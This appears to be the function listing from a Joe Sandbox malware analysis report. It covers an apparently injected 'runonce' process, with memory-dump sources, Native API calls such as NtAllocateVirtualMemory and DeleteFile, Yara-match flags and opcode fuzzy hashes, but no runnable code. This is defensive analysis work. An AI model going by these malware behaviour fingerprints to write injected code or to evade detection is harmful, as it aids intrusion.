                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 4fe4d4a4f5fba608506e6ee99c311c2000c566b40a5d4f96252ecb147c3a56cd
                                          • Instruction ID: 7bb71919d0e45cdb3f9f2757139f80aeeed3d67b6882717098472b078f506727
                                          • Opcode Fuzzy Hash: 4fe4d4a4f5fba608506e6ee99c311c2000c566b40a5d4f96252ecb147c3a56cd
                                          • Instruction Fuzzy Hash: 3F31D7B5A01609AFCB14DF59D880EEFB7B9EF8C314F10821AFD18A7240D730A911CBA4
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(031015BE,?,031169D7,00000000,00000004,00003000,?,?,?,?,?,031169D7,031015BE,031169D7,00000000), ref: 03117DFD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: da1a8f351d8819f43fa8ac7bd25e82019e0a88ec241fd628c0d54c0e00b0e3d8
                                          • Instruction ID: 6d0267bd9cb51d9aa43786cd5583f1ab606d65d0b95533ea200233c4b9394f73
                                          • Opcode Fuzzy Hash: da1a8f351d8819f43fa8ac7bd25e82019e0a88ec241fd628c0d54c0e00b0e3d8
                                          • Instruction Fuzzy Hash: E1210A75A01609AFCB14DF58DC81FEFB7A9EF8C310F00851AFD18A7240E770A9218BA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 7e7ff9e7b1ca138608ac6c7e57f32c91d1ba2697154d09500ad5ba06417acfc5
                                          • Instruction ID: 518c2c23b13d843a22afd8071204a9e523240094d75eaffd727d9f9442d4c1b4
                                          • Opcode Fuzzy Hash: 7e7ff9e7b1ca138608ac6c7e57f32c91d1ba2697154d09500ad5ba06417acfc5
                                          • Instruction Fuzzy Hash: 54015E35A41744BFD624EA64DC41FEBB7ACDFC8610F40845AFA18AB180EB757910C7A5
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03117C24
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: c4a52db1624aee6394cd4238915a4ff74d2b7e8a15e58c6595a88deeb0a8acb4
                                          • Instruction ID: fd6a7ecfeb413d877dc60266edced95ce110674c8675f99db7b4e0db4dec2a48
                                          • Opcode Fuzzy Hash: c4a52db1624aee6394cd4238915a4ff74d2b7e8a15e58c6595a88deeb0a8acb4
                                          • Instruction Fuzzy Hash: 05E04636241714BBD220EA69DC01FDBB7ACDFC9664F418015FA08AB241D771B91086B0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 49014e7c33c1b3ade6ef1d4a0e455db6035f86c76a127adc72903f36dcd77de8
                                          • Instruction ID: 6654fae23614c116ba58e0d07273650356f2939cda8d864709187dc2898dd5c5
                                          • Opcode Fuzzy Hash: 49014e7c33c1b3ade6ef1d4a0e455db6035f86c76a127adc72903f36dcd77de8
                                          • Instruction Fuzzy Hash: CF9002616012404285407158994440AA0159BE13017D1C559A0544560CC6288855A279
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d60cd35eb59a01b8d592a8956d550e41d3c96d7713776029324fed834dc4d916
                                          • Instruction ID: f1b98ed2000353a8ae84f666a449fdf5b3254a2a4a3182d6e22d6b0dd57f90fd
                                          • Opcode Fuzzy Hash: d60cd35eb59a01b8d592a8956d550e41d3c96d7713776029324fed834dc4d916
                                          • Instruction Fuzzy Hash: 4590023160554012D540715899C454A80159BE0301F91C455E0414554CCA2489566371
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bf39b01d603bf7a12581952cba2d4d89120a4c23c1b03c0104ace15afea75b47
                                          • Instruction ID: 9f608d4820a52d6d58a213cad6b22705b7c2cd51f747d46576397c9b5071c3e4
                                          • Opcode Fuzzy Hash: bf39b01d603bf7a12581952cba2d4d89120a4c23c1b03c0104ace15afea75b47
                                          • Instruction Fuzzy Hash: F590023120114413D5116158964470B40198BD0241FD1C856A0414558DD6668952B131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3eb5a97342a97e67cf7de0a690ad5975f9d84b216de2a9d3abb48900b8eb2098
                                          • Instruction ID: 8d3a5d90c3c0deafebb4bc6b947f18fc6e9759b80b767c087cd6310514001234
                                          • Opcode Fuzzy Hash: 3eb5a97342a97e67cf7de0a690ad5975f9d84b216de2a9d3abb48900b8eb2098
                                          • Instruction Fuzzy Hash: 1490022160114502D5017158954461A401A8BD0241FD1C466A1014555ECA358992B131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 631184192708a93b062995860d40e9e895b9468f56403e80a7bec178fa141212
                                          • Instruction ID: ff5368ae397336143d678229cc3930f6cfc178ac5a4045a09d2fbc2e26762fe1
                                          • Opcode Fuzzy Hash: 631184192708a93b062995860d40e9e895b9468f56403e80a7bec178fa141212
                                          • Instruction Fuzzy Hash: 4490022921314002D5807158A54860E40158BD1202FD1D859A0005558CC92588696331
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d4acaf3d99cc04fdf332a8218375dc4690493cba1280cbb87161b4663db8d4bd
                                          • Instruction ID: 596289af70221b83df1c06b525ed522a82f2aac24723fd6d403c0e2bbd492851
                                          • Opcode Fuzzy Hash: d4acaf3d99cc04fdf332a8218375dc4690493cba1280cbb87161b4663db8d4bd
                                          • Instruction Fuzzy Hash: 1990022130114003D5407158A55860A8015DBE1301F91D455E0404554CD92588566232
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b09d824407b0d2953746c0136b270225ff3d821f06ae61c7b62ef7edf82b8994
                                          • Instruction ID: 23514696de6f5f39b814fa9e8e4c10df963c544f63ca37a9ad47bae1f21ce5f2
                                          • Opcode Fuzzy Hash: b09d824407b0d2953746c0136b270225ff3d821f06ae61c7b62ef7edf82b8994
                                          • Instruction Fuzzy Hash: D3900221242181529945B158954450B80169BE0241BD1C456A1404950CC5369856E631
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 31e78b0dcb3436ced031a18bddf7548f8b8475215e877ba5682dc502afcd829d
                                          • Instruction ID: 7d7658e6259c8a1a177f1ad2a9b626fb81918177c93f66dcdff2da7e9e1ba218
                                          • Opcode Fuzzy Hash: 31e78b0dcb3436ced031a18bddf7548f8b8475215e877ba5682dc502afcd829d
                                          • Instruction Fuzzy Hash: 6A90022121194042D60065689D54B0B40158BD0303F91C559A0144554CC92588616531
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 05c4ba94413780f906c2453d2a1951e5c9537ff6b4b50adea1a3830d8e1e0683
                                          • Instruction ID: 21413483705f356985b3adcd94ea74a291046d8424f13ce3ad18894efab100ca
                                          • Opcode Fuzzy Hash: 05c4ba94413780f906c2453d2a1951e5c9537ff6b4b50adea1a3830d8e1e0683
                                          • Instruction Fuzzy Hash: 9990026120154403D5406558994460B40158BD0302F91C455A2054555ECA398C517135
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1522051ef38295ab039871cc40d6f7a591bef897e369c659aa0e99607dcacbaf
                                          • Instruction ID: 03ced4219cfd71c27d6a9e8d205165c2175f12a0fd1b49b0310b2d8c985b96bb
                                          • Opcode Fuzzy Hash: 1522051ef38295ab039871cc40d6f7a591bef897e369c659aa0e99607dcacbaf
                                          • Instruction Fuzzy Hash: 3990026134114442D50061589554B0A4015CBE1301F91C459E1054554DC629CC527136
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3d2d3fbe723f3ed1a9fecac3a08c122446ca78e4b11a8afcb8486d47da19c18e
                                          • Instruction ID: 0dc35c0441c0ab27d2afc3089cb4d2c948e0160b8b5390d04af8817571d3a761
                                          • Opcode Fuzzy Hash: 3d2d3fbe723f3ed1a9fecac3a08c122446ca78e4b11a8afcb8486d47da19c18e
                                          • Instruction Fuzzy Hash: 7A9002216011404285407168D98490A8015AFE1211B91C565A0988550DC56988656675
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b971ead80d7a6dcf5494c639019601489e80491470d0193cbdd1de403900f0fe
                                          • Instruction ID: 307d41e32bb86bcefc1cc4ca29d14ef7dd396077395ba2317b614427d0cf8f22
                                          • Opcode Fuzzy Hash: b971ead80d7a6dcf5494c639019601489e80491470d0193cbdd1de403900f0fe
                                          • Instruction Fuzzy Hash: DB900435311140034505F55C574450F4057CFD53517D1C475F1005550CD731CC717131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e29eceb1ec2dd3a12d616d7818a1c48f38331c72734d2a4b694dc9959ecb1544
                                          • Instruction ID: 21d564c50483f864bfc23e68a5d50dc0f88b8adb504655ba40eba21e10ded944
                                          • Opcode Fuzzy Hash: e29eceb1ec2dd3a12d616d7818a1c48f38331c72734d2a4b694dc9959ecb1544
                                          • Instruction Fuzzy Hash: 9990023120518842D54071589544A4A40258BD0305F91C455A0054694DD6358D55B671
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 85e6a518af4839900558cfe314a1f2e4b9b6cf58f9b68c62d444d9abf38900fb
                                          • Instruction ID: 6d2ba3036cc7286b75ef18786a4535c60f5e5fd7f76831dce5fc5a2485dc9454
                                          • Opcode Fuzzy Hash: 85e6a518af4839900558cfe314a1f2e4b9b6cf58f9b68c62d444d9abf38900fb
                                          • Instruction Fuzzy Hash: 2690023120114802D5807158954464E40158BD1301FD1C459A0015654DCA258A5977B1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6e34bacb192e81e263b613bf8a0fe2bf987d3779828f2099cb11521e159cd81c
                                          • Instruction ID: 3dcb525fdacf217ebbb188efe4c4aa04ad2ca8012341cc3d5fc90b04d95bea48
                                          • Opcode Fuzzy Hash: 6e34bacb192e81e263b613bf8a0fe2bf987d3779828f2099cb11521e159cd81c
                                          • Instruction Fuzzy Hash: 5F90023120114842D50061589544B4A40158BE0301F91C45AA0114654DC625C8517531
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f653268edf942acdb10286a60aa4552289658773f0c94e57d65278ed7285f3cc
                                          • Instruction ID: 375c9264b9ecb3849a8a1d420e05e363cf6fbdf0639b991c2a8284a09e34ae2b
                                          • Opcode Fuzzy Hash: f653268edf942acdb10286a60aa4552289658773f0c94e57d65278ed7285f3cc
                                          • Instruction Fuzzy Hash: BE9002312011C802D5106158D54474E40158BD0301F95C855A4414658DC6A588917131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c049ff1ea7437dafa2e2a81afc6edd99662b2c4e981a76bc8072a2ffdad3d463
                                          • Instruction ID: 8ece3e4af4186328fb0709cf8eb7fffb2af31cd30d05b9fcd43aff5c0b2f989b
                                          • Opcode Fuzzy Hash: c049ff1ea7437dafa2e2a81afc6edd99662b2c4e981a76bc8072a2ffdad3d463
                                          • Instruction Fuzzy Hash: 1190023120114402D5006598A54864A40158BE0301F91D455A5014555EC67588917131
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4120ba03be360642fb4f6b3740a3b9de867e0a64cfcd8852737bfceccdeb2f84
                                          • Instruction ID: 6925b8caa3557da397a1afa655ef8315528a70278adb81596414aaef3a97140b
                                          • Opcode Fuzzy Hash: 4120ba03be360642fb4f6b3740a3b9de867e0a64cfcd8852737bfceccdeb2f84
                                          • Instruction Fuzzy Hash: C6900225221140024545A558574450F44559BD63517D1C459F1406590CC63188656331
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 745f205d9b94d8693a79235bd066523bf209cd10a239a3a3ec0dc6850e2f0a23
                                          • Instruction ID: b231d150455ba2b1ee6feabd82b2d91872aed57bdfab845a4d5e345c202765a8
                                          • Opcode Fuzzy Hash: 745f205d9b94d8693a79235bd066523bf209cd10a239a3a3ec0dc6850e2f0a23
                                          • Instruction Fuzzy Hash: EF9002612021400385057158955461A801A8BE0201F91C465E1004590DC53588917135
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f3fe113ba60d1a08f2d4964e6ae0b017e2bfd034ce108f6ab1e988e5ab754528
                                          • Instruction ID: b8fc1c1cecd9ea332785f06833f22e29ac6dc0d44f128b31aeefc5ece8b20b42
                                          • Opcode Fuzzy Hash: f3fe113ba60d1a08f2d4964e6ae0b017e2bfd034ce108f6ab1e988e5ab754528
                                          • Instruction Fuzzy Hash: 8290023160514802D5507158955474A40158BD0301F91C455A0014654DC7658A5576B1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3b2e68626ae7de9482a8d946c6f4242805d31a77668912e9e5386a21fd608657
                                          • Instruction ID: 79e4b8abb36dd248157f7ae146d0d9a11d6a5e9c364f4a5daa10a6f593450e27
                                          • Opcode Fuzzy Hash: 3b2e68626ae7de9482a8d946c6f4242805d31a77668912e9e5386a21fd608657
                                          • Instruction Fuzzy Hash: F990023160524402D5006158965470A50158BD0201FA1C855A0414568DC7A5895175B2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fa09d3c9305b2a173893dd60472ab1d9fd72d073ac53aba71b8fff1d001cd778
                                          • Instruction ID: 2163a438e93dcd9b9785bf7e2fa021e483fb657e767f2551db06c556bf8c204d
                                          • Opcode Fuzzy Hash: fa09d3c9305b2a173893dd60472ab1d9fd72d073ac53aba71b8fff1d001cd778
                                          • Instruction Fuzzy Hash: F690022124519102D550715C954461A8015ABE0201F91C465A0804594DC56588557231

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(-34715NM,00000111,00000000,00000000), ref: 031006D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: -34715NM$-34715NM
                                          • API String ID: 1836367815-3092426006
                                          • Opcode ID: 4b481ae92608985fed24b29d047d955ce244151b6fda4820961c99ec0bf9e985
                                          • Instruction ID: 724ae3a65b0a5370d55c6c8f9d90f907becbfe8c7b884205d1684a8e09e189ad
                                          • Opcode Fuzzy Hash: 4b481ae92608985fed24b29d047d955ce244151b6fda4820961c99ec0bf9e985
                                          • Instruction Fuzzy Hash: 8E01A576D0120C7FDB11EAE48C81EEF7B7CDF89794F058064FA14BB140E6656E068BA1

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(-34715NM,00000111,00000000,00000000), ref: 031006D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: -34715NM$-34715NM
                                          • API String ID: 1836367815-3092426006
                                          • Opcode ID: 252c2bb0807d31d14717919abaf09ec075647ff14cf89486de8ffd356ef63522
                                          • Instruction ID: 562e8a9783527f259a5a6faa83e7073fa3d9f400210f875c9fd5f4902dc4c1e0
                                          • Opcode Fuzzy Hash: 252c2bb0807d31d14717919abaf09ec075647ff14cf89486de8ffd356ef63522
                                          • Instruction Fuzzy Hash: 3F01C476D0120C7BDB11EAE48C81DEF7B7CDF88694F048064FA14BB140E6645E068BA1
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 0311286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: d7234d465d862a04e060ed67ef27d26c92b6055dbb2316bd3fbde86adbe3b0f8
                                          • Instruction ID: e496977a873e698da6be99a005b456f64c0948592b551e6cf180b4877c3457d0
                                          • Opcode Fuzzy Hash: d7234d465d862a04e060ed67ef27d26c92b6055dbb2316bd3fbde86adbe3b0f8
                                          • Instruction Fuzzy Hash: 7431A6B5A01704BBC724DF65D880FDBBBB8FB88700F04462DAA5D5B240D7B07651CBA4
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0310E847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 804d6e634cd60fbf2a4739bc3b470ba7a390625aaa89991191acf5b01a31d8f2
